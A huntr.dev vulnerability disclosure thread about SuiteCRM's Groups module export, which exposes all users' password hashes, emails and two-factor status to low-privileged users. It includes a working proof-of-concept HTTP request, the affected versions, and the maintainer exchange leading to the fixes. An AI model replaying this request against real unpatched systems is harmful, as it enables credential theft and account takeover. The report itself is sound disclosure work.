Insufficient access control in the export functionality for the 'Groups' module exposing user password hashes in salesagility/suitecrm

Valid

Reported on

Aug 16th 2023


Description

The web application incorrectly returns sensitive data to authenticated lower privileged users when making requests to export data from the 'Groups' module. This includes information such as the user's email address, password hash and whether two-factor authentication is configured.

Proof of Concept

To export sensitive information for all users on the application, the following request could be sent (version 8.3):

POST /legacy/index.php?entryPoint=export HTTP/1.1
Host: [APPLICATION_HOSTNAME]
Cookie: EmailGridWidths=0=10&1=10&2=150&3=250&4=175&5=125; ck_login_language_20=en_us; sugar_user_theme=suite8; sugar_user_theme=SuiteP; ck_login_id_20=2ed13b79-8c22-0f61-9511-64d0d6214ce7; ck_login_language_20=en_us; LEGACYSESSID=o67um0uqlvvbq090cq47ed84vi; PHPSESSID=ec351p8sg0sf51as5grrvc66kn; XSRF-TOKEN=8IkPTqHry3UFRIx_Sk47HIS2hnLvwvVr5jp_UVm79To; ck_login_id_20=f0950665-7c37-520f-9b61-64d2066e623e
Content-Length: 26
Cache-Control: max-age=0
Sec-Ch-Ua: 
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
Origin: [APPLICATION_HOSTNAME]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

module=Groups&action=index

The attack can be exploited on versions 7.12.9 and 7.13.4by sending the request to /index.php?entryPoint=export instead.

The native intension of this functionality appears to be allowing users to export data from tables based on the module page they're viewing. The testing team enumerated all of the modules present in the application and began sending a series of requests to export data whilst changing the value of the module parameter to each module previously identified. From our testing, it appears only the Groups modules returns overly permissive data.

Impact

An authenticated attacker could leverage this vulnerability to obtain users' password hashes and perform offline password cracking in an attempt to obtain users' passwords. If successful, they could use it to log into the application as that user, if two factor is not configured. Additionally, if the password is used in other applications, it could be possible to perform a credential stuffing attack.

Finally, if an administrator account password is broken and the account does not implement two factor authentication, it would be possible to authentication to the application with highest permission level, where it may then be possible to perform additional attacks.

Occurrences

It appears no validation is performed to ensure the user is authorised to view the data returned from the export query. Given the sensitive natures of the information returned from this request, it should be limited to administrators or sensitive data should be withheld if the user lacks the required permissions.

Note: This vulnerability is also present in public/legacy/modules/Groups/Groups.php for version 8.3, however this could not be added as a new occurrence as its appears the code is not present on GitHub for this revision.

We are processing your report and will contact the salesagility/suitecrm team within 24 hours. 6 months ago
illume-security modified the report
6 months ago
We have contacted a member of the salesagility/suitecrm team and are waiting to hear back 6 months ago
salesagility/suitecrm maintainer
6 months ago

Maintainer


Hi illume-security,

Thank you for your Security Report.

We have raised the issue from this report with our internal security team to be confirmed.

Below is a reference of the issue raised and ID allocated:

SCRMBT-#242 - HuntrDev: Insufficient access control in the export functionality for the 'Groups' module exposing user password hashes in salesagility/suitecrm

We will review the issue and confirm whether or not it is a vulnerability within SuiteCRM and meets our criteria for a Security issue. If an issue is not considered a Security issue or that it does not need to be private then we'll raise it via the GitHub bug tracker or a more appropriate place.

Thank you for your contribution to the SuiteCRM project.

Kind regards, SuiteCRM Security Team

illume-security
5 months ago

Researcher


Thank you - do you have an update regarding this vulnerability?

salesagility/suitecrm maintainer validated this vulnerability 5 months ago

Hi @illume-security,

Thank you for getting back to us.

The Security Team has assessed the following issue: SCRMBT-#242 - HuntrDev: Insufficient access control in the export functionality for the 'Groups' module exposing user password hashes in salesagility/suitecrm

This issue has been given a severity grading of 'Important'.

We have worked on a fix for the issue and it is scheduled to go on the next maintenance release, which is due very soon.

Once the fix is released, we aim to include your name in the release notes - giving credit for finding and reporting this issue. Please let us know if you would prefer not be included or have a specific request on how you would like to be referenced within the release notes.

Once the issue is resolved on huntr.dev a CVE is emitted which we will add to the release notes.

Thank you for your assistance and contribution to the SuiteCRM product!

Kind regards, SuiteCRM Security Team

illume-security has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
illume-security
5 months ago

Researcher


Hello team,

Thank you for the prompt update! I am happy to hear that a fix has been completed, and I look forward to the release.

Regarding credit for the vulnerability, we're a security company (illume Security) that identified this vulnerability as part of Web Application Penetration for a client and then performed additional testing after the test was completed to confirm any additional versions it may have affected. If possible, can the vulnerability be attributed to the 2 testers from illume Security? These are Josh Lees & Robert Stokes.

If required, we are happy to review the changes after the release and attempt to identify if the vulnerability is still present and if any additions could be made to our requests to trigger similar issues.

Kind regards,

salesagility/suitecrm maintainer marked this as fixed in 7.14.1 with commit c43eaa 5 months ago
The fix bounty has been dropped
This vulnerability has now been published 5 months ago
Group.php#L72-L88 has been validated
salesagility/suitecrm maintainer gave praise 5 months ago
Hi @illume-security, Thank you for getting in touch regarding the following security report: - SCRMBT-#242 - HuntrDev: Insufficient access control in the export functionality for the 'Groups' module exposing user password hashes in salesagility/suitecrm The fix for this issue was introduced in versions 7.12.13, 7.14.1, 8.4.1 respectively. The release notes for each of these releases have been updated to reflect this. The CVE has been assinged by huntr.dev, you can find it in details of this report. Thank you for your assistance and contribution to the SuiteCRM product! Kind regards, SuiteCRM Security Team
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
illume-security
4 months ago

Researcher


Hello Team, thank you for the update. From a review of the CVE description, it says it only affects the version prior to 7.14.1. However, as detailed in our description and your confirmation in a release in version 8.4.1, this vulnerability also affected version 8.3. Can the CVE description please be updated to reflect this, as users on version 8.3 may choose not to upgrade as they would not believe they're affected?

Also, just confirm, where are we able to see the attribution on the CVE to Josh Lees & Robert Stokes?

to join this conversation